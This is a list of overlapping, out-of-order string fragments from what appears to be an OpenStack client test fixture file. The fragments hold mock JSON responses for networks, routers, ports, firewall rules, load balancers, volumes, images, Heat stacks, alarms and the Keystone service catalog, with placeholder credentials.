"= [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS =",
"'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Volume Service', 'type': 'volume' }, {",
"{ \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = {",
"None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID,",
"\"shared\": False } ] } SERVERS_LIST = { \"servers\": [ { \"accessIPv4\": \"\",",
"\"name\": \"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" }",
"\"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\"",
"} ] VOLUMES_LIST = { \"volumes\": [ { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\":",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID }, {",
"\"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\":",
"= [ { \"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An",
"None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID } ] } FLOATING_IPS_LIST",
"\"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"]",
"\"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\":",
"\"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None,",
"\"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\":",
"\"License\"); you may # not use this file except in compliance with the",
"} ] } SERVERS_LIST = { \"servers\": [ { \"accessIPv4\": \"\", \"accessIPv6\": \"\",",
"{ \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ari\",",
"STACKS_LIST = { \"stacks\": [ { \"description\": \"First test\", \"links\": [ { \"href\":",
"\"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = { \"networks\": [ { \"status\": \"ACTIVE\", \"subnets\":",
"None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\",",
"'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'EC2 Service', 'type': 'ec2' }, {",
"'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version': { u'id': u'v2.0', u'links': [ {u'href': u'%s' %",
"\"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\":",
"\"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, { \"router_id\": None, \"tenant_id\": PROJECT_ID,",
"[], 'username': 'exampleuser' } } } ROLE_LIST = {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name':",
"not use this file except in compliance with the License. You may obtain",
"PROJECT_ID, \"id\": ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\":",
"\"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\",",
"\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ] } ROUTER1_PORTS",
"ALARMS_LIST = [ { \"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\":",
"\"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST = { \"volumes\": [ { \"attachments\": [], \"availability_zone\": \"nova\",",
"}, { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\":",
"\"id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True,",
"\"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\"",
"\"user_id\": \"fake\" } ] } IMAGES_LIST = { \"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\",",
"} LBAAS_POOL_LIST = { \"pools\": [ { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\",",
"}, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ]",
"\"max_retries\": 5, \"http_method\": \"GET\", \"timeout\": 2, \"pools\": [], \"url_path\": \"/\", \"type\": \"HTTP\", \"id\":",
"\"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\":",
"[ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\":",
"\"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\",",
"LBAAS_POOL_IDS[0], \"session_persistence\": None }, { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\",",
"\"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [],",
"PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False } ] } SERVERS_LIST",
"VOLUME_BACKUPS_LIST = { u'backups': [ {u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A",
"USER_ID = '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT",
"'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False",
"\"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" } ] } SNAPSHOTS_LIST =",
"PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\",",
"PROJECT_ID, \"id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\":",
"\"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test2\", \"name\": \"Meterlabel2\", \"id\":",
"'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Image Service', 'type': 'image'",
"'username': 'exampleuser' } } } ROLE_LIST = {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'},",
"\"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\":",
"\"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\":",
"PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] }",
"\"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ] } SECGROUPS_LIST = { \"security_groups\": [ { \"description\":",
"# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the",
"u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}]",
"\"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\":",
"\"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\":",
"\"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\":",
"\"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second test\",",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None,",
"= {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544',",
"\"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY = { \"router\": { \"status\": \"ACTIVE\",",
"'image' }, { 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}],",
"None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\",",
"\"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\": None,",
"True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"],",
"\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\",",
"STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Object Storage Service', 'type': 'object-store' }, {",
"\"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\": 25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\"",
"ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\":",
"\"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second test\", \"links\": [ { \"href\":",
"\"description\": \"Testing firewall policy 1\" }, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID,",
"{}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" } ]",
"\"Second test\", \"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\",",
"LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST = { \"members\": [ { \"id\": LBAAS_MEMBER_IDS[0], \"address\":",
"= 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version': { u'id': u'v2.0', u'links': [ {u'href': u'%s'",
"\"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ],",
"\"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0] }, {",
"[ { \"addr\": \"192.168.0.3\", \"version\": 4 } ] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": {",
"\"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\": \"GET\", \"timeout\": 2, \"pools\":",
"80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\":",
"} ], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\":",
"License. TOKEN_ID = '<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\"",
"\"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\":",
"{ \"health_monitors\": [ { \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\", \"max_retries\":",
"'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR",
"= { \"firewall_rules\": [ { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None,",
"\"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\":",
"FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False",
"\"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False },",
"= { \"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False,",
"ROUTERS_IDS[1] } ] } NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [",
"\"count\": 1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 = [ { \"hash\":",
"\"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An alarm\", \"enabled\": True,",
"\"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\",",
"] } LBAAS_POOL_LIST = { \"pools\": [ { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\":",
"UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ],",
"= [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS =",
"'Identity Service', 'type': 'identity' }, { 'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL':",
"\"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An alarm\", \"enabled\": True, \"insufficient_data_actions\": [",
"\"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\": None, \"stack_status\": \"DELETE_FAILED\", \"id\": \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\" } ] }",
"u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'} ], u'media-types': [ {u'base': u'application/json',",
"= [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent from the Server",
"\"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True,",
"None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True,",
"u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name':",
"True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ] } SECGROUPS_LIST = {",
"'name': 'EC2 Service', 'type': 'ec2' }, { 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0',",
"'type': 'compute' }, { 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region':",
"[\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"]",
"PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ] } NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports']",
"\"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\":",
"True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False,",
"{ \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0],",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"},",
"\"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\":",
"{ \"firewalls\": [ { \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\":",
"False, \"deleted_at\": None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0,",
"= { \"volumes\": [ { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\",",
"u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'}",
"LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent from the",
"[], 'name': 'Identity Service', 'type': 'identity' }, { 'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL':",
"0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ] } IMAGES_LIST",
"u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'} ], u'media-types': [ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base':",
"\"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None }, { \"status\": \"ACTIVE\", \"protocol\":",
"[\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS",
"\"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False }, { \"status\": \"ACTIVE\",",
"} ] } FIREWALL_POLICY_LIST = { \"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]],",
"]} REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" }",
"'RegionOne'}], 'endpoints_links': [], 'name': 'EC2 Service', 'type': 'ec2' }, { 'endpoints': [{ 'adminURL':",
"\"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall",
"\"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST =",
"\"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None } ] } LBAAS_POOL_LIST = { \"pools\":",
"{ \"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\": { \"private\": [ { \"addr\": \"192.168.0.3\", \"version\":",
"\"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\"",
"\"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ], \"metadata\": { \"My Server Name\": \"Apache1\" },",
"'janeausten', 'name': 'bar'}, {'container': 'marktwain', 'name': 'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS",
"\"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\" }, { \"status\": \"ACTIVE\", \"name\":",
"] }, \"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\",",
